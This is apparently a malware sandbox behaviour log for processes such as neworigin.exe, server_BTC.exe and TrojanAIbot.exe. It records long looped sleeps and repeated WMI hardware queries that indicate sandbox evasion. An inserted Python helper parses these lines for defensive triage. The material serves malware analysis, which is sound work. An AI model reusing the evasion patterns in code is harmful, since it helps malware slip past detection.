Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96368s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96263s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96151s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -96032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95904s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95794s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95685s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95576s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95467s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95357s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95248s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95139s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -95019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94899s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94639s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94495s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94283s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94154s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -94044s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93825s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93717s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93607s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -93498s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199202s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -36893488147419080s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99757s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99528s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99420s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99091s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98983s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98764s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98654s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98545s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98210s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97967s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97824s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97611s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97483s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97372s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97153s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96936s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96826s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96716s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96608s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96498s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96389s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96280s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95951s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95842s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95733s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95620s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95514s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95405s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95295s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95165s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94420s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94311s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94202s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94092s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -93983s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -93872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6096 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 372 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
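The sleep-time, sleep-count and WMI evidence above is easier to triage per process than per line. The following Python helper is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses lines in exactly this format, separates real timed sleeps from the 922337203685477 value (assumed here to be Int64.MaxValue in 100-ns ticks divided by 10000, i.e. an INFINITE-style wait rather than an evasion sleep), and records which WMI classes each process enumerated. Two further assumptions: the numbers the report prints with an "s" suffix are treated as milliseconds, which is consistent with the 30000 threshold and with values such as 60000 and 1199968, and the set of hardware-fingerprinting classes is limited to those named in this report. The sample lines are copied from the evidence above.

```python
"""Per-process triage of Joe Sandbox 'Thread sleep' and 'WMI Queries' evidence lines.

Added example for this report, not sandbox or malware code. Assumptions are marked.
"""
import re
from collections import defaultdict

# Assumption: 922337203685477 == Int64.MaxValue in 100-ns ticks // 10000, i.e. an
# INFINITE-style wait. Anything at or above it is a sentinel/overflow, not a timed sleep.
INFINITE_SENTINEL_MS = (2**63 - 1) // 10_000

# Assumption: the report prints "s" but the numbers behave like milliseconds
# (threshold 30000 == 30 s, 60000 == 1 min, 1199968 ~= 20 min).
SLEEP_RE = re.compile(
    r"^Source:\s+(?P<proc>\S+)\s+TID:\s+\d+\s+Thread sleep time:\s+-?(?P<ms>\d+)s\s+>=\s+-?\d+s"
)
COUNT_RE = re.compile(
    r"^Source:\s+(?P<proc>\S+)\s+TID:\s+\d+\s+Thread sleep count:\s+(?P<n>\d+)\s+>\s+\d+"
)
WMI_RE = re.compile(
    r"^Source:\s+(?P<proc>\S+)\s+WMI Queries:\s+IWbemServices::(?P<method>\w+)\s+-\s+(?P<ns>\S+)\s+:\s+(?P<query>.+)$"
)
CLASS_RE = re.compile(r"\bFROM\s+(\w+)", re.IGNORECASE)

# Hardware classes this report shows being queried; extend for other samples.
VM_FINGERPRINT_CLASSES = {"Win32_BaseBoard", "Win32_Processor", "Win32_NetworkAdapter"}


def _new_entry():
    return {"sleep_events": 0, "sentinel_waits": 0, "max_finite_ms": 0,
            "total_finite_ms": 0, "loop_counts": [], "wmi_queries": 0,
            "wmi_classes": set()}


def parse_report_lines(lines):
    """Group sleep/WMI evidence lines by source process path."""
    summary = defaultdict(_new_entry)
    for raw in lines:
        line = raw.strip()
        if line.endswith("Jump to behavior"):      # UI link text left in the export
            line = line[: -len("Jump to behavior")].rstrip()
        if m := SLEEP_RE.match(line):
            e = summary[m["proc"]]
            ms = int(m["ms"])                      # the sign only marks a relative delay
            e["sleep_events"] += 1
            if ms >= INFINITE_SENTINEL_MS:
                e["sentinel_waits"] += 1
            else:
                e["max_finite_ms"] = max(e["max_finite_ms"], ms)
                e["total_finite_ms"] += ms
        elif m := COUNT_RE.match(line):
            summary[m["proc"]]["loop_counts"].append(int(m["n"]))
        elif m := WMI_RE.match(line):
            e = summary[m["proc"]]
            e["wmi_queries"] += 1
            query = m["query"].strip()
            cls = CLASS_RE.search(query)           # ExecQuery: "SELECT * FROM X"
            e["wmi_classes"].add(cls.group(1) if cls else query)  # CreateInstanceEnum: "X"
    return dict(summary)


def evasion_flags(entry, sleep_threshold_ms=30_000, loop_threshold=30):
    """Reduce one process entry to triage flags, emitted in a fixed order."""
    flags = []
    if entry["max_finite_ms"] >= sleep_threshold_ms:
        flags.append("long_sleep")
    if any(n > loop_threshold for n in entry["loop_counts"]):
        flags.append("sleep_loop")
    if entry["sentinel_waits"] and "long_sleep" not in flags:
        flags.append("sentinel_only")             # blocking wait, not a timed evasion
    if entry["wmi_classes"] & VM_FINGERPRINT_CLASSES:
        flags.append("wmi_hw_fingerprint")
    return flags


SAMPLE_LINES = [  # copied from the evidence lines of this report
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224 Thread sleep time: -99688s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 5880 Thread sleep time: -922337203685477s >= -30000s Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep count: 7244 > 30",
    r"Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200 Thread sleep time: -173580000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199968s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460 Thread sleep count: 6957 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
]

if __name__ == "__main__":
    for proc, entry in parse_report_lines(SAMPLE_LINES).items():
        name = proc.rsplit("\\", 1)[-1]
        print(f"{name:18} max_sleep={entry['max_finite_ms']:>10} ms "
              f"sentinel={entry['sentinel_waits']} loops={entry['loop_counts']} "
              f"wmi={sorted(entry['wmi_classes'])} -> {evasion_flags(entry)}")
```

Values far above the sentinel (36893488147419080, 33204139332677172) are overflowed tick conversions and land in the same bucket. A process whose only sleep hits are sentinel waits, such as server_BTC.exe here, is blocking on a handle rather than running a timed evasion loop and should not be scored like neworigin.exe, whose decreasing ~100 s and ~20 min delays on one thread, thousands of short sleeps on another, and repeated Win32_BaseBoard/Win32_Processor enumeration together form the actual sandbox-evasion picture.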
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 4_2_02E45908
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99792
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99578
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99227
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99027
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98915
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98788
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98667
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98560
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98454
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98310
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98167
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97929
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97796
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97680
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97578
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97466
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97349
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97213
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97089
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96966
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96808
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96390
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96268
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96144
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96020
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95893
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95765
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95653
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95542
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95430
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95320
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95200
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95087
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94853
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94743
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94634
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94495
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94377
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94244
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94113
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93977
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93660
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93392
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93166
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99853
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99688
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99825
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99378
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98963
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98847
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98718
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98603
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98484
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98353
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98220
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98089
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97956
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97754
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97499
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97358
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97238
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97100
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96991
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96789
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96199
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95844
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95705
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95481
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95325
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95156
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94986
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94810
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94636
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94311
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94191
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94042
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93915
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93745
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99852
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99690
